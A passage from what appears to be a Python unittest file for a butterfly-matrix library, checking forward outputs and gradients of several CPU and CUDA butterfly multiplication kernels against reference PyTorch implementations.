for device in ['cpu'] + ([] if not torch.cuda.is_available() else ['cuda']):
for complex in [False, True]:
for increasing_stride in [True, False]:
scaling = 1 / math.sqrt(2) if not complex else 1 / 2
twiddle = torch.randn((nstack, n - 1, 2, 2) + (() if not complex else (2, )), requires_grad=True, device=device) * scaling
input = torch.randn((batch_size, nstack, n) + (() if not complex else (2, )), requires_grad=True, device=twiddle.device)
output = butterfly_mult(twiddle, input, increasing_stride)
output_torch = butterfly_mult_torch(twiddle, input, increasing_stride)
self.assertTrue(torch.allclose(output, output_torch, rtol=self.rtol, atol=self.atol),
((output - output_torch).abs().max().item(), device, complex, increasing_stride))
grad = torch.randn_like(output_torch)
d_twiddle, d_input = torch.autograd.grad(output, (twiddle, input), grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_torch, rtol=self.rtol, atol=self.atol),
((d_input - d_input_torch).abs().max().item(), device, complex, increasing_stride))
# print((d_twiddle - d_twiddle_torch) / d_twiddle_torch)
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_torch, rtol=self.rtol, atol=self.atol),
(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().max().item(), device, complex, increasing_stride))
def test_butterfly_untied(self):
for batch_size, n in [(10, 4096), (8192, 256)]: # Test size smaller than 1024 and large batch size for race conditions
m = int(math.log2(n))
nstack = 2
for device in ['cpu'] + ([] if not torch.cuda.is_available() else ['cuda']):
for complex in [False, True]:
for increasing_stride in [True, False]:
if batch_size > 1024 and (device == 'cpu' or complex):
continue
scaling = 1 / math.sqrt(2) if not complex else 1 / 2
twiddle = torch.randn((nstack, m, n // 2, 2, 2) + (() if not complex else (2, )), requires_grad=True, device=device) * scaling
input = torch.randn((batch_size, nstack, n) + (() if not complex else (2, )), requires_grad=True, device=twiddle.device)
output = butterfly_mult_untied(twiddle, input, increasing_stride)
output_torch = butterfly_mult_untied_torch(twiddle, input, increasing_stride)
self.assertTrue(torch.allclose(output, output_torch, rtol=self.rtol, atol=self.atol),
((output - output_torch).abs().max().item(), device, complex, increasing_stride))
grad = torch.randn_like(output_torch)
d_twiddle, d_input = torch.autograd.grad(output, (twiddle, input), grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_torch, rtol=self.rtol, atol=self.atol),
((d_input - d_input_torch).abs().max().item(), device, complex, increasing_stride))
# if device == 'cuda' and batch_size > 1024 and not complex and increasing_stride:
# print((d_twiddle - d_twiddle_torch).abs().mean(dim=(0, 2, 3, 4)))
# print(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().mean(dim=(0, 2, 3, 4)))
# i = ((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().argmax()
# print(d_twiddle.flatten()[i])
# print(d_twiddle_torch.flatten()[i])
# print(d_twiddle.flatten()[i-5:i+5])
# print(d_twiddle_torch.flatten()[i-5:i+5])
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_torch, rtol=self.rtol * (10 if batch_size > 1024 else 1),
atol=self.atol * (10 if batch_size > 1024 else 1)),
(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().max().item(),
(batch_size, n), device, complex, increasing_stride))
def test_butterfly_untied_eval(self):
for batch_size, n in [(1, 256), (2, 512), (8, 512), (10, 512)]:
m = int(math.log2(n))
nstack = 2
for device in ['cpu']:
for complex in [True]:
for increasing_stride in [True, False]:
scaling = 1 / math.sqrt(2)
twiddle = torch.randn((nstack, m, n // 2, 2, 2), requires_grad=True, device=device) * scaling
input = torch.randn((batch_size, nstack, n), requires_grad=True, device=twiddle.device)
output = butterfly_multiply_untied_eval(twiddle, input, increasing_stride)
output_torch = butterfly_mult_untied_torch(twiddle, input, increasing_stride)
self.assertTrue(torch.allclose(output, output_torch, rtol=self.rtol, atol=self.atol),
((output - output_torch).abs().max().item(), device, complex, increasing_stride))
def test_butterfly_ortho_tied(self):
for batch_size, n in [(10, 4096), (8192, 256)]: # Test size smaller than 1024 and large batch size for race conditions
m = int(math.log2(n))
nstack = 2
for device in ['cpu'] + ([] if not torch.cuda.is_available() else ['cuda']):
for increasing_stride in [True, False]:
if batch_size > 1024 and (device == 'cpu'):
continue
twiddle = torch.rand((nstack, n - 1), requires_grad=True, device=device) * 2 * math.pi
input = torch.randn((batch_size, nstack, n), requires_grad=True, device=twiddle.device)
output = butterfly_ortho_mult_tied(twiddle, input, increasing_stride)
output_torch = butterfly_ortho_mult_tied_torch(twiddle, input, increasing_stride)
self.assertTrue(torch.allclose(output, output_torch, rtol=self.rtol, atol=self.atol),
((output - output_torch).abs().max().item(), device, increasing_stride))
grad = torch.randn_like(output_torch)
d_twiddle, d_input = torch.autograd.grad(output, (twiddle, input), grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_torch, rtol=self.rtol, atol=self.atol),
((d_input - d_input_torch).abs().max().item(), device, increasing_stride))
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_torch, rtol=self.rtol * (10 if batch_size > 1024 else 1),
atol=self.atol * (10 if batch_size > 1024 else 1)),
(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().max().item(),
(batch_size, n), device, increasing_stride))
def test_butterfly_ortho_untied(self):
for batch_size, n in [(10, 4096), (8192, 256)]: # Test size smaller than 1024 and large batch size for race conditions
m = int(math.log2(n))
nstack = 2
for device in ['cpu'] + ([] if not torch.cuda.is_available() else ['cuda']):
for increasing_stride in [True, False]:
if batch_size > 1024 and (device == 'cpu'):
continue
twiddle = torch.rand((nstack, m, n // 2), requires_grad=True, device=device) * 2 * math.pi
input = torch.randn((batch_size, nstack, n), requires_grad=True, device=twiddle.device)
output = butterfly_ortho_mult_untied(twiddle, input, increasing_stride)
output_torch = butterfly_ortho_mult_untied_torch(twiddle, input, increasing_stride)
self.assertTrue(torch.allclose(output, output_torch, rtol=self.rtol, atol=self.atol),
((output - output_torch).abs().max().item(), device, increasing_stride))
grad = torch.randn_like(output_torch)
d_twiddle, d_input = torch.autograd.grad(output, (twiddle, input), grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_torch, rtol=self.rtol, atol=self.atol),
((d_input - d_input_torch).abs().max().item(), device, increasing_stride))
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_torch, rtol=self.rtol * (10 if batch_size > 1024 else 1),
atol=self.atol * (10 if batch_size > 1024 else 1)),
(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().max().item(),
(batch_size, n), device, increasing_stride))
def test_bbt_untied(self):
for batch_size, n in [(2048, 512), (10, 4096)]:
for nblocks in list(range(1, 4)) + [10, 14]: # Test nblocks >= 7
m = int(math.log2(n))
nstack = 2
for device in ([] if not torch.cuda.is_available() else ['cuda']) + ['cpu']:
if batch_size > 1024 and device == 'cpu':
continue
scaling = 1 / 2
twiddle = torch.randn((nstack, nblocks * 2 * m, n // 2, 2, 2), requires_grad=True, device=device) * scaling
input = torch.randn((batch_size, nstack, n), requires_grad=True, device=twiddle.device)
output = bbt_mult_untied(twiddle, input)
output_torch = bbt_mult_untied_torch(twiddle, input)
self.assertTrue(torch.allclose(output, output_torch, rtol=self.rtol, atol=self.atol),
((output - output_torch).abs().max().item(), nblocks, device))
grad = torch.randn_like(output_torch)
d_twiddle, d_input = torch.autograd.grad(output, (twiddle, input), grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_torch, rtol=self.rtol, atol=self.atol),
((d_input - d_input_torch).abs().max().item(), nblocks, device))
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_torch, rtol=self.rtol * (10 if batch_size > 1024 else 1),
atol=self.atol * (10 if batch_size > 1024 else 1)),
(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().max().item(),
(batch_size, n), nblocks, device))
def test_bbt_ortho_untied(self):
for batch_size, n in [(2048, 512), (10, 4096)]:
for nblocks in list(range(1, 4)) + [10, 14]: # Test nblocks >= 7
m = int(math.log2(n))
nstack = 2
for device in ([] if not torch.cuda.is_available() else ['cuda']) + ['cpu']:
if batch_size > 1024 and device == 'cpu':
continue
twiddle = torch.rand((nstack, nblocks * 2 * m, n // 2), requires_grad=True, device=device) * 2 * math.pi
input = torch.randn((batch_size, nstack, n), requires_grad=True, device=twiddle.device)
output = bbt_ortho_mult_untied(twiddle, input)
output_torch = bbt_ortho_mult_untied_torch(twiddle, input)
self.assertTrue(torch.allclose(output, output_torch, rtol=self.rtol, atol=self.atol),
((output - output_torch).abs().max().item(), (batch_size, n), nblocks, device))
grad = torch.randn_like(output_torch)
d_twiddle, d_input = torch.autograd.grad(output, (twiddle, input), grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_torch, rtol=self.rtol, atol=self.atol),
((d_input - d_input_torch).abs().max().item(), (batch_size, n), nblocks, device))
# if device == 'cuda' and batch_size > 1024 and nblocks == 14:
# print((d_twiddle - d_twiddle_torch).abs().mean(dim=(0, 2)))
# print(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().mean(dim=(0, 2)))
# i = ((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().argmax()
# print(d_twiddle.flatten()[i])
# print(d_twiddle_torch.flatten()[i])
# print(d_twiddle.flatten()[i-5:i+5])
# print(d_twiddle_torch.flatten()[i-5:i+5])
# The relative-error check can fail for large nblocks because some d_twiddle
# entries are very small; the relaxed tolerances below account for this.
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_torch, rtol=self.rtol * (10 if batch_size > 1024 else 1),
atol=self.atol * (10 if batch_size > 1024 else 1)),
(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().max().item(),
(batch_size, n), nblocks, device))
def test_butterfly_untied_svd(self):
for batch_size, n in [(10, 4096), (99, 128)]: # Test size smaller than 1024
m = int(math.log2(n))
nstack = 2
for device in ['cpu'] + ([] if not torch.cuda.is_available() else ['cuda']):
for increasing_stride in [True, False]:
scaling = 1 / math.sqrt(2)
twiddle = torch.randn((nstack, m, n // 2, 2, 2), requires_grad=True, device=device) * scaling
input = torch.randn((batch_size, nstack, n), requires_grad=True, device=twiddle.device)
output = butterfly_mult_untied_svd(twiddle, input, increasing_stride)
output_torch = butterfly_mult_untied_svd_torch(twiddle, input, increasing_stride)
self.assertTrue(torch.allclose(output, output_torch, rtol=self.rtol, atol=self.atol),
((output - output_torch).abs().max().item(), device, increasing_stride))
grad = torch.randn_like(output_torch)
d_twiddle, d_input = torch.autograd.grad(output, (twiddle, input), grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_torch, rtol=self.rtol, atol=self.atol),
((d_input - d_input_torch).abs().max().item(), device, increasing_stride))
# print((d_twiddle - d_twiddle_torch) / d_twiddle_torch)
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_torch, rtol=self.rtol, atol=self.atol),
(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().max().item(), device, increasing_stride))
# @unittest.skip("Not numerically stable if twiddle factors aren't orthogonal")
def test_butterfly_inplace_cpu(self):
batch_size = 10
n = 4096
# TODO: in-place implementation doesn't support nstack for now
nstack = 1
b = Butterfly(n, n, bias=False, ortho_init=True)
twiddle = b.twiddle
input = torch.randn(batch_size, nstack, n, requires_grad=True)
output_inplace = butterfly_mult_inplace(twiddle.squeeze(0), input.squeeze(1))
output_torch = butterfly_mult_torch(twiddle, input).squeeze(1)
self.assertTrue(torch.allclose(output_inplace, output_torch, rtol=self.rtol, atol=self.atol),
(output_inplace - output_torch).abs().max().item())
grad = torch.randn_like(output_torch)
d_twiddle_inplace, d_input_inplace = torch.autograd.grad(output_inplace, (twiddle, input), grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input_inplace, d_input_torch, rtol=self.rtol, atol=self.atol),
(d_input_inplace - d_input_torch).abs().max().item())
# print((d_twiddle_inplace - d_twiddle_torch) / d_twiddle_torch)
self.assertTrue(torch.allclose(d_twiddle_inplace, d_twiddle_torch, rtol=self.rtol, atol=self.atol),
((d_twiddle_inplace - d_twiddle_torch) / d_twiddle_torch).abs().max().item())
# @unittest.skip("Not numerically stable if twiddle factors aren't orthogonal")
def test_butterfly_complex_inplace_cpu(self):
batch_size = 10
n = 4096
# TODO: in-place implementation doesn't support nstack for now
nstack = 1
b = Butterfly(n, n, bias=False, complex=True, ortho_init=True)
twiddle = b.twiddle
input = torch.randn(batch_size, nstack, n, 2, requires_grad=True)
output_inplace = butterfly_mult_inplace(twiddle.squeeze(0), input.squeeze(1))
output_torch = butterfly_mult_torch(twiddle, input).squeeze(1)
self.assertTrue(torch.allclose(output_inplace, output_torch, rtol=self.rtol, atol=self.atol),
(output_inplace - output_torch).abs().max().item())
# @unittest.skip("Not numerically stable if twiddle factors aren't orthogonal")
@unittest.skipIf(not torch.cuda.is_available(), "need CUDA")
def test_butterfly_inplace_cuda(self):
batch_size = 10
n = 4096
# TODO: in-place implementation doesn't support nstack for now
nstack = 1
b = Butterfly(n, n, bias=False, ortho_init=True).to('cuda')
twiddle = b.twiddle
input = torch.randn(batch_size, nstack, n, requires_grad=True, device=twiddle.device)
output_inplace = butterfly_mult_inplace(twiddle.squeeze(0), input.squeeze(1))
output_torch = butterfly_mult_torch(twiddle, input).squeeze(1)
self.assertTrue(torch.allclose(output_inplace, output_torch, rtol=self.rtol, atol=self.atol),
(output_inplace - output_torch).abs().max().item())
grad = torch.randn_like(output_torch)
d_twiddle_inplace, d_input_inplace = torch.autograd.grad(output_inplace, (twiddle, input), grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input_inplace, d_input_torch, rtol=self.rtol, atol=self.atol),
(d_input_inplace - d_input_torch).abs().max().item())
# print((d_twiddle_inplace - d_twiddle_torch) / d_twiddle_torch)
self.assertTrue(torch.allclose(d_twiddle_inplace, d_twiddle_torch, rtol=self.rtol, atol=self.atol),
((d_twiddle_inplace - d_twiddle_torch) / d_twiddle_torch).abs().max().item())
def test_butterfly_factors(self):
batch_size = 10
n = 4096
nstack = 1  # butterfly_mult_factors does not support nstack > 1
for device in ['cpu'] + ([] if not torch.cuda.is_available() else ['cuda']):
for complex in [False, True]:
for increasing_stride in [True, False]:
scaling = 1 / math.sqrt(2) if not complex else 1 / 2
twiddle = torch.randn((nstack, n - 1, 2, 2) + (() if not complex else (2, )), requires_grad=True, device=device) * scaling
input = torch.randn((batch_size, nstack, n) + (() if not complex else (2, )), requires_grad=True, device=twiddle.device)
output = butterfly_mult_factors(twiddle.squeeze(0), input.squeeze(1), increasing_stride=increasing_stride)
output_torch = butterfly_mult_torch(twiddle, input, increasing_stride=increasing_stride).squeeze(1)
self.assertTrue(torch.allclose(output, output_torch, rtol=self.rtol, atol=self.atol),
((output - output_torch).abs().max().item(), device, complex, increasing_stride))
grad = torch.randn_like(output_torch)
d_twiddle, d_input = torch.autograd.grad(output, (twiddle, input), grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_torch, rtol=self.rtol, atol=self.atol),
((d_input - d_input_torch).abs().max().item(), device, complex, increasing_stride))
# print((d_twiddle - d_twiddle_torch) / d_twiddle_torch)
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_torch, rtol=self.rtol, atol=self.atol),
(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().max().item(), device, complex, increasing_stride))
@unittest.skipIf(not torch.cuda.is_available(), "need CUDA")
def test_butterfly_conv2d(self):
device = 'cuda'
c_in = 256
kernel_size = 3
batch_size = 128
f_dim = 8
padding = 1
for c_out in [c_in, 2*c_in]:
nstack = c_out // c_in * kernel_size * kernel_size
m = int(math.log2(c_in))
for increasing_stride in [True, False]:
scaling = 1 / math.sqrt(2)
twiddle = torch.randn((nstack, m, c_in // 2, 2, 2), requires_grad=True, device=device) * scaling
input_ = torch.randn(batch_size, c_in, f_dim, f_dim,
requires_grad=True).to(device)
# test forward pass
output_torch = butterfly_mult_conv2d_torch(twiddle, input_, kernel_size,
padding, increasing_stride)
output = butterfly_mult_conv2d(twiddle, input_, kernel_size,
padding, increasing_stride)
self.assertTrue(torch.allclose(output, output_torch, rtol=self.rtol, atol=self.atol),
((output - output_torch).abs().max().item(), device, c_out, increasing_stride))
# test backward pass
grad = torch.randn_like(output_torch)
d_twiddle, d_input = torch.autograd.grad(output, (twiddle, input_),
grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch,
(twiddle, input_), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_torch,
rtol=self.rtol, atol=self.atol),
((d_input - d_input_torch).abs().max().item(), device, c_out, increasing_stride))
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_torch,
rtol=self.rtol * 10, atol=self.atol * 10),
(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().max().item(), device, c_out, increasing_stride))
@unittest.skipIf(not torch.cuda.is_available(), "need CUDA")
def test_bbt_conv2d(self):
device = 'cuda'
c_in = 256
kernel_size = 3
batch_size = 128
f_dim = 8
padding = 1
for c_out in [c_in, 2*c_in]:
nstack = c_out // c_in * kernel_size * kernel_size
m = int(math.log2(c_in))
# for nblocks in list(range(1, 4)) + [10, 14]: # Test nblocks >= 7
for nblocks in list(range(1, 3)):  # Reduced from the full range above for speed; no longer covers nblocks >= 7
scaling = 1 / math.sqrt(2)
twiddle = torch.randn((nstack, nblocks * 2 * m, c_in // 2, 2, 2), requires_grad=True, device=device) * scaling
input_ = torch.randn(batch_size, c_in, f_dim, f_dim,
requires_grad=True).to(device)
# test forward pass
output_torch = bbt_mult_conv2d_torch(twiddle, input_, kernel_size, padding)
output = bbt_mult_conv2d(twiddle, input_, kernel_size, padding)
self.assertTrue(torch.allclose(output, output_torch, rtol=self.rtol, atol=self.atol),
((output - output_torch).abs().max().item(), device, nblocks, c_out))
# test backward pass
grad = torch.randn_like(output_torch)
d_twiddle, d_input = torch.autograd.grad(output, (twiddle, input_),
grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch,
(twiddle, input_), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_torch,
rtol=self.rtol, atol=self.atol),
((d_input - d_input_torch).abs().max().item(), device, nblocks, c_out))
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_torch,
rtol=self.rtol * 10, atol=self.atol * 10),
(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().max().item(), device, nblocks, c_out))
@unittest.skipIf(not torch.cuda.is_available(), "need CUDA")
def test_butterfly_conv2d_svd(self):
device = 'cuda'
c_in = 256
kernel_size = 3
batch_size = 128
f_dim = 8
padding = 1
for c_out in [c_in, 2*c_in]:
nstack = c_out // c_in * kernel_size * kernel_size
m = int(math.log2(c_in))
for increasing_stride in [True, False]:
scaling = 1 / math.sqrt(2)
twiddle = torch.randn((nstack, m, c_in // 2, 2, 2), requires_grad=True, device=device) * scaling
input_ = torch.randn(batch_size, c_in, f_dim, f_dim,
requires_grad=True).to(device)
# test forward pass
output_torch = butterfly_mult_conv2d_svd_torch(twiddle, input_, kernel_size,
padding, increasing_stride)
output = butterfly_mult_conv2d_svd(twiddle, input_, kernel_size,
padding, increasing_stride)
self.assertTrue(torch.allclose(output, output_torch, rtol=self.rtol, atol=self.atol),
((output - output_torch).abs().max().item(), device, c_out, increasing_stride))
# test backward pass
grad = torch.randn_like(output_torch)
d_twiddle, d_input = torch.autograd.grad(output, (twiddle, input_),
grad, retain_graph=True)
d_twiddle_torch, d_input_torch = torch.autograd.grad(output_torch,
(twiddle, input_), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_torch,
rtol=self.rtol, atol=self.atol),
((d_input - d_input_torch).abs().max().item(), device, c_out, increasing_stride))
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_torch,
rtol=self.rtol * 10, atol=self.atol * 10),
(((d_twiddle - d_twiddle_torch) / d_twiddle_torch).abs().max().item(), device, c_out, increasing_stride))
@unittest.skipIf(not torch.cuda.is_available(), "need CUDA")
def test_butterfly_untied_fast(self):
for batch_size, n in [(2048, 512)]:
m = int(math.log2(n))
nstack = 1
# for device in ['cpu'] + ([] if not torch.cuda.is_available() else ['cuda']):
for device in ['cuda']:
# for complex in [False, True]:
for complex in [False]:
for increasing_stride in [True, False]:
# for increasing_stride in [False]:
if batch_size > 1024 and (device == 'cpu' or complex):
continue
scaling = 1 / math.sqrt(2) if not complex else 1 / 2
twiddle = torch.randn((nstack, m, n // 2, 2, 2) + (() if not complex else (2, )), requires_grad=True, device=device) * scaling
# twiddle = torch.arange(2 * n, dtype=torch.float, device=device, requires_grad=True).reshape(n // 2, 2, 2).unsqueeze(0).repeat(m, 1, 1, 1).unsqueeze(0)
twiddle_fast = twiddle_normal_to_fast_format(twiddle)
if not increasing_stride:
twiddle_fast = twiddle_fast.flip(1)
input = torch.randn((batch_size, nstack, n) + (() if not complex else (2, )), requires_grad=True, device=twiddle.device)
# input = torch.arange(n, dtype=torch.float, device=device, requires_grad=True).unsqueeze(0).unsqueeze(1).expand(batch_size, -1, -1)
output = butterfly_multiply_untied_forward_fast(twiddle_fast, input, increasing_stride)
# output_old = butterfly_mult_untied_torch(twiddle, input, increasing_stride)
output_old = butterfly_mult_untied(twiddle, input, increasing_stride)
self.assertTrue(torch.allclose(output, output_old, rtol=self.rtol, atol=self.atol),
((output - output_old).abs().max().item(), device, complex, increasing_stride))
if n > 4096:
continue
grad = torch.randn_like(output)
d_twiddle, d_input = butterfly_multiply_untied_forward_backward_fast(twiddle_fast, input,
grad, increasing_stride)
# d_twiddle, d_input = torch.autograd.grad(output, (twiddle_fast, input), grad, retain_graph=True)
d_twiddle_old, d_input_old = torch.autograd.grad(output_old, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_old, rtol=self.rtol, atol=self.atol),
((d_input - d_input_old).abs().max().item(), device, complex, increasing_stride))
d_twiddle_old = twiddle_normal_to_fast_format(d_twiddle_old)
if not increasing_stride:
d_twiddle_old = d_twiddle_old.flip(1)
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_old, rtol=self.rtol * (10 if batch_size > 1024 else 1),
atol=self.atol * (10 if batch_size > 1024 else 1)),
(((d_twiddle - d_twiddle_old) / d_twiddle_old).abs().max().item(),
(batch_size, n), device, complex, increasing_stride))
@unittest.skipIf(not torch.cuda.is_available(), "need CUDA")
def test_butterfly_bbs_untied_fast(self):
for batch_size, n in [(2048, 512)]:
m = int(math.log2(n))
nstack = 1
nblocks = 3
# for device in ['cpu'] + ([] if not torch.cuda.is_available() else ['cuda']):
for device in ['cuda']:
if batch_size > 1024 and (device == 'cpu'):
continue
scaling = 1 / math.sqrt(2)
twiddle = torch.randn((nstack, nblocks * 2 * m, n // 2, 2, 2), requires_grad=True, device=device) * scaling
# twiddle = torch.arange(16.0, requires_grad=True, device=device).view(nstack, nblocks * 2 * m, n // 2, 2, 2)
input = torch.randn((batch_size, nstack, n), requires_grad=True, device=twiddle.device)
# input = torch.arange(2.0, requires_grad=True, device=twiddle.device).view(batch_size, nstack, n)
twiddle_fast = []
for i, chunk in enumerate(twiddle.chunk(nblocks * 2, dim=1)):
chunk_fast = twiddle_normal_to_fast_format(chunk)
if i % 2 == 0:
chunk_fast = chunk_fast.flip(1)
twiddle_fast.append(chunk_fast)
twiddle_fast = torch.cat(twiddle_fast, dim=1)
output = butterfly_bbs_multiply_untied_forward_fast(twiddle_fast, input)
output_old = input
for block in range(nblocks):
output_old = butterfly_mult_untied(twiddle[:, block * 2 * m:(block * 2 + 1) * m], output_old, False)
output_old = butterfly_mult_untied(twiddle[:, (block * 2 + 1) * m:(block + 1) * 2 * m], output_old, True)
self.assertTrue(torch.allclose(output, output_old, rtol=self.rtol, atol=self.atol),
((output - output_old).abs().max().item(), device))
grad = torch.randn_like(output)
# grad = input.clone()
d_twiddle, d_input = butterfly_bbs_multiply_untied_forward_backward_fast(twiddle_fast, input, grad)
# d_twiddle, d_input = torch.autograd.grad(output, (twiddle_fast, input), grad, retain_graph=True)
d_twiddle_old, d_input_old = torch.autograd.grad(output_old, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_old, rtol=self.rtol, atol=self.atol),
((d_input - d_input_old).abs().max().item(), device))
d_twiddle_temp = []
for i, chunk in enumerate(d_twiddle_old.chunk(nblocks * 2, dim=1)):
chunk_fast = twiddle_normal_to_fast_format(chunk)
if i % 2 == 0:
chunk_fast = chunk_fast.flip(1)
d_twiddle_temp.append(chunk_fast)
d_twiddle_old = torch.cat(d_twiddle_temp, dim=1)
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_old, rtol=self.rtol * (10 if batch_size > 1024 else 1),
atol=self.atol * (10 if batch_size > 1024 else 1)),
(((d_twiddle - d_twiddle_old) / d_twiddle_old).abs().max().item(),
(batch_size, n), device))
@unittest.skipIf(not torch.cuda.is_available(), "need CUDA")
def test_butterfly_ortho_untied_fast(self):
for batch_size, n in [(2048, 4096)]:
m = int(math.log2(n))
nstack = 1
# for device in ['cpu'] + ([] if not torch.cuda.is_available() else ['cuda']):
for device in ['cuda']:
for increasing_stride in [True, False]:
if batch_size > 1024 and (device == 'cpu'):
continue
twiddle = torch.rand((nstack, m, n // 2), requires_grad=True, device=device) * 2 * math.pi
# twiddle = torch.ones((nstack, m, n // 2), requires_grad=True, device=device) * 2 * math.pi * 0.3
twiddle_fast = twiddle if increasing_stride else twiddle.flip(1)
input = torch.randn((batch_size, nstack, n), requires_grad=True, device=twiddle.device)
twiddle_fast_cos, twiddle_fast_sin = twiddle_fast.cos(), twiddle_fast.sin()
output = butterfly_ortho_multiply_untied_forward_fast(twiddle_fast_cos, twiddle_fast_sin, input, increasing_stride)
# output_old = butterfly_ortho_mult_untied_torch(twiddle, input)
output_old = butterfly_ortho_mult_untied(twiddle, input, increasing_stride)
self.assertTrue(torch.allclose(output, output_old, rtol=self.rtol, atol=self.atol),
((output - output_old).abs().max().item(), device, increasing_stride))
grad = torch.randn_like(output)
d_twiddle, d_input = butterfly_ortho_multiply_untied_backward_fast(twiddle_fast_cos, twiddle_fast_sin,
output, grad, increasing_stride)
# d_twiddle, d_input = torch.autograd.grad(output, (twiddle_fast, input), grad, retain_graph=True)
d_twiddle_old, d_input_old = torch.autograd.grad(output_old, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_old, rtol=self.rtol, atol=self.atol),
((d_input - d_input_old).abs().max().item(), device, increasing_stride))
if not increasing_stride:
d_twiddle_old = d_twiddle_old.flip(1)
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_old, rtol=self.rtol * (10 if batch_size > 1024 else 1),
atol=self.atol * (10 if batch_size > 1024 else 1)),
(((d_twiddle - d_twiddle_old) / d_twiddle_old).abs().max().item(),
(batch_size, n), device, increasing_stride))
@unittest.skipIf(not torch.cuda.is_available(), "need CUDA")
def test_butterfly_odo_untied_fast(self):
for batch_size, n in [(2048, 512)]:
m = int(math.log2(n))
nstack = 1
nblocks = 4
# for device in ['cpu'] + ([] if not torch.cuda.is_available() else ['cuda']):
for device in ['cuda']:
if batch_size > 1024 and (device == 'cpu'):
continue
twiddle = torch.rand((nstack, nblocks * 2 * m, n // 2), requires_grad=True, device=device) * 2 * math.pi
# diagonal = torch.randn((nstack, nblocks, n), requires_grad=True, device=device)
# Not numerically stable so we need diagonals to be away from zero
diagonal = torch.rand((nstack, nblocks, n), requires_grad=True, device=device) + 0.1
# diagonal = torch.ones((nstack, nblocks, n), requires_grad=True, device=device) * 0.1
input = torch.randn((batch_size, nstack, n), requires_grad=True, device=twiddle.device)
twiddle_fast_cos, twiddle_fast_sin = twiddle.cos(), twiddle.sin()
output = butterfly_odo_multiply_untied_forward_fast(twiddle_fast_cos, twiddle_fast_sin,
diagonal, input)
# output_old = butterfly_odo_mult_untied_torch(twiddle, input)
output_old = input
for block in range(nblocks):
output_old = butterfly_ortho_mult_untied(twiddle[:, block * 2 * m:(block * 2 + 1) * m].flip(1), output_old, False)
output_old = output_old * diagonal[:, block]
output_old = butterfly_ortho_mult_untied(twiddle[:, (block * 2 + 1) * m:(block + 1) * 2 * m], output_old, True)
self.assertTrue(torch.allclose(output, output_old, rtol=self.rtol, atol=self.atol),
((output - output_old).abs().max().item(), device))
grad = torch.randn_like(output)
# d_twiddle, d_diagonal, d_input = butterfly_odo_multiply_untied_backward_fast(twiddle_fast_cos, twiddle_fast_sin,
# diagonal, output, grad)
d_twiddle, d_diagonal, d_input = butterfly_odo_multiply_untied_forward_backward_fast(twiddle_fast_cos, twiddle_fast_sin,
diagonal, input, grad)
# d_twiddle, d_input = torch.autograd.grad(output, (twiddle_fast, input), grad, retain_graph=True)
d_twiddle_old, d_diagonal_old, d_input_old = torch.autograd.grad(output_old, (twiddle, diagonal, input), grad, retain_graph=True)
